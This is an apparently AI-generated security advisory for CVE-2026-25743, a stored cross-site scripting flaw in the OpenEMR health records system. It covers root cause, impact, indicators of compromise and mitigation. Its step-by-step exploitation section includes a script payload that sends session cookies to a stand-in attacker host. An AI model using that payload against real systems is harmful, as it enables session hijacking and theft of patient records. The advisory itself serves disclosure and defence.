CVE-2026-25743: 
OpenEMR vulnerability analysis and mitigation

Overview

CVE-2026-25743 is a stored cross-site scripting (XSS) vulnerability in OpenEMR, a widely used open-source electronic health records (EHR) and medical practice management application. It affects all versions prior to 8.0.0 (confirmed affected version: 7.0.4 and earlier). The vulnerability was disclosed on February 25, 2026, with a patch released in version 8.0.0. It carries a CVSS v3.1 base score of 4.8 (Medium) and a CVSS v4.0 base score of 7.2 (High) (GitHub Advisory, Feedly).

Technical details

The root cause is improper neutralization of user-controlled input during web page generation (CWE-79). In src/Services/QuestionnaireResponseService.php, the renderItem() function directly interpolated unsanitized answer values into HTML output ($html .= "{$answerValue}\n";) without escaping, allowing arbitrary JavaScript to be stored and later rendered in the browser. An attacker with the "Forms administration" role can enter a malicious JavaScript payload (e.g., <script>...</script>) into a questionnaire form answer field during a patient encounter. The payload is stored server-side and executes in the browsers of any user with the same role who subsequently views the encounter page or visit history. The fix wraps the answer value with the text() escaping function before rendering (GitHub Advisory, Patch Commit).

Impact

Successful exploitation allows an authenticated attacker to inject persistent JavaScript that executes in the browsers of other users with the "Forms administration" role when they view patient encounter pages or visit history. This can result in session hijacking, credential theft, unauthorized actions performed on behalf of legitimate users, and exfiltration of sensitive patient health records. Given that OpenEMR handles protected health information (PHI), exploitation could constitute a HIPAA-reportable breach and severely undermine application integrity and patient data confidentiality (GitHub Advisory).

Exploitability

A proof-of-concept is referenced in the GitHub Security Advisory, but there is no evidence of active in-the-wild exploitation at this time. The EPSS score is approximately 0.0029 (0.29%), indicating a low probability of exploitation in the near term. Exploitation requires an authenticated account with the "Forms administration" role and user interaction (a victim must view the compromised form), limiting the attack surface. No threat actor attribution or CISA KEV catalog listing has been identified (GitHub Advisory, Feedly).

Exploitation steps

  1. Gain access: Log in to the OpenEMR instance using an account with the "Forms administration" (Administration/Forms) role — this could be the default admin account or any user granted this role.
  2. Navigate to a patient encounter: Select or create a patient via Patient > New/Search, then create or open a visit via Patient > Visits > Create Visit or Visit History.
  3. Open a questionnaire: On the Encounter tab, click Questionnaires > New Questionnaire and select a LOINC form that includes a free-text input field (e.g., "Fecal hydrolysis panel - 57795-7").
  4. Inject the XSS payload: In a free-text answer field, enter a malicious JavaScript payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an event-based variant.
  5. Save the form: Click "Save Current" — the payload is stored in the database and the XSS fires immediately upon redirect to the Encounter tab for the attacker's own session.
  6. Trigger execution for victims: Any other user with the "Forms administration" role who navigates to the patient's Encounter tab or hovers over the form entry in Visit History will have the malicious script execute in their browser, enabling session token theft or other unauthorized actions (GitHub Advisory).

Indicators of compromise

  • Logs: OpenEMR application or web server access logs showing POST requests to questionnaire/encounter endpoints containing HTML/JavaScript tags (e.g., <script>, onerror=, onmouseover=) in form answer parameters.
  • Logs: Unexpected outbound HTTP requests from the OpenEMR server or client browsers to external domains shortly after users view patient encounter or visit history pages.
  • Database: Entries in the questionnaire response tables (associated with QuestionnaireResponseService) containing raw HTML or JavaScript strings in answer value fields rather than plain text.
  • Network: Unusual GET or POST requests from OpenEMR users' browsers to attacker-controlled domains, potentially carrying session cookie data in query parameters.
  • File System: No direct file system artifacts expected, as the payload is stored in the database rather than the file system (GitHub Advisory).

Mitigation and workarounds

Upgrade OpenEMR to version 8.0.0 or later, which applies the fix by wrapping answer values with the text() HTML-escaping function in QuestionnaireResponseService.php (Patch Commit). If immediate patching is not feasible, restrict the "Forms administration" role to the minimum number of trusted users and monitor their activity closely. Additionally, implementing a strict Content Security Policy (CSP) header can reduce the impact of XSS exploitation, though it does not remediate the underlying vulnerability (GitHub Advisory).

Community reactions

The vulnerability was reported by researcher "lassiiiiii" and remediated by developer "kojiromike" (Michael A. Smith), with the advisory published by OpenEMR maintainer "bradymiller" on February 25, 2026. Red Hat has tracked the CVE in their security database. No significant broader media coverage or notable social media discussion has been identified beyond standard vulnerability database aggregation (GitHub Advisory, Red Hat CVE).

Additional resources


Source: This report was generated using AI

Related OpenEMR vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-40506HIGH7
  • OpenEMR logoOpenEMR
  • cpe:2.3:a:open-emr:openemr
NoYesAug 17, 2026
CVE-2026-76614MEDIUM5.3
  • OpenEMR logoOpenEMR
  • cpe:2.3:a:open-emr:openemr
NoYesAug 19, 2026
CVE-2026-40509MEDIUM5.3
  • OpenEMR logoOpenEMR
  • cpe:2.3:a:open-emr:openemr
NoYesAug 19, 2026
CVE-2026-40508MEDIUM5.1
  • OpenEMR logoOpenEMR
  • cpe:2.3:a:open-emr:openemr
NoYesAug 19, 2026
CVE-2026-40507MEDIUM5.1
  • OpenEMR logoOpenEMR
  • cpe:2.3:a:open-emr:openemr
NoYesAug 19, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management